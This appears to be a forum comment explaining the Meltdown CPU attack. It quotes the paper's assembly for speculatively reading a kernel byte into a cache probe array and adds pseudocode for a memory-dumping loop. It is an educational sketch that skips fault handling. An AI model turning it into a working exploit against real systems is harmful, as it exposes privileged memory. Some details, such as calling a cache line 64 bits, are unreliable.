Here's the example from the paper.
1: ; rcx = kernel address
2: ; rbx = probe array
3: retry:
4: mov al, byte [rcx] ; Read kernel memory(1 byte) into AL which is the least significant byte of RAX
5: shl rax, 0xc ; Multiply the collected value by 4096
6: jz retry ; Retry in case of zero to reduce noise
7: mov rbx, qword [rbx + rax] ; Access memory based on the value read on line 4
8: ; Note: The read on line 4 is illegal, but the CPU speculatively executes line 5-7 before this triggers a fault.
The receiving code then trys to access each of these 256 memory locations and measure the time taken. For one of them the value will be much lower since that memory is cached and thus that location is the value read. So if you read the value 84 on line 4 when you access the value at 344064dec(0x54000)in your memory it will be faster and you can deduce the read value was 84.So in pseudo code the attack is
start = 0xFFEE // No idea if this is a reasonable start location
result = []
offset = 0
page_size = 4096
probe_array = malloc(256 * page_size)
loop {
flush_caches(probe_array)
read_and_prepare_cache(start + offset * 8, probe_array) // The above assembly
result.push(determine_read_value(probe_array))
offset += 1
}
There's an extra detail here about recovering from the illegal memory access in a quick way that I've skipped.To answer the parents question I believe this only uses a single cache line(64 bits) since it only accesses a single value.
This is my understanding anyway, happy to be corrected
No comments yet.